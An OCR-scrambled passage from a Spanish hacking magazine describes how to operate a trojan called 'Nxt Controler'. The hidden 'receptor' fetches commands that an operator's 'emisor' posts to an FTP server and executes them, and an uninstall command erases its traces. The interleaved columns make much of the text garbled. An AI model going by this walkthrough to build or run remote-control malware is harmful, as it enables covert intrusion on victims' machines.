• [UNINSTALL]-Elimina todo
rastro de el virus
(Figura 1)

42 www.hackingmexico.mx
nxt controler
.TXT .TXT

EMISOR RECEPTOR
(Figura 2)

Debemos Aceptar los términos para debemos teclear ENTER y para poder
crear el archivo, y le damos en el escribir debemos de darle clic al cua-
botón create, Se creara un archivo dro de texto.
DATA.dat este siempre debe estar
presente ya que este contiene las con-
figuraciones de el servidor FTP.

¿COMO FUNCIONA EL VIRUS?


En realidad es muy simple, pero todo
empieza en el Emisor, El emisor Sube
a el servidor FTP un comando en un ar-
chivo de texto, después el receptor baja
ese archivo de texto y si en este existe
algún comando lo ejecuta. (Figura 2)

REMOTE CONTROLER
(EMISOR) El cuadro Verde Que se encuentra
En la pantalla principal de el emisor en la esquina superior izquierda indi-
tenemos que insertar la información ca si esta escuchando o está enviando,
de nuestro servidor, así podremos ini- cuando aparece es que está escuchan-
ciar sesión y empezar a atacar. do por lo cual no nos permitirá escri-
bir hasta que le demos clic a donde
queremos escribir esto lo apagara has-
ta que enviemos un ENTER, esto lo
activara y seguirá escuchando.

RECEPTOR O VIRUS
En este screenshot mostraremos como
es que se ve el test o el de prueba, ya
que en realidad cuando se ejecuta este
no se ve ,En la parte superior es donde
se muestran los comandos y lo envia-
do por el emisor, en este caso aparece
“Hola Mi Lord” esto ocurre ya que
al crearse los archivos en el servidor
se guarda así el archivo de texto, tu
puedes enviar texto con el emisor asi
como una conversación y el receptor
la recibirá aunque este no hará nada,
Una vez iniciados Sesión podemos
cada que recibe un comando este res-
empezar a enviar comandos, para esto
ponde diciendo que el comando ha
solo tenemos que escribir comandos,
sido ejecutado.
por default se escribirán en mayus,
no debemos olvidar que todos vienen
entre corchetes, y que para enviar solo

www.hackingmexico.mx 43
#02

www.hackingmexico.mx / PENETRANDO TU MENTE / AÑO 0 / # 02


Algo más allá de lo visible

Ingeniería social

Penetración de servidores windows

Bypassing de Uploaders

WarDriving

Nxt Controler Un troyano Para divertirse

Hackeando Correos

Вам также может понравиться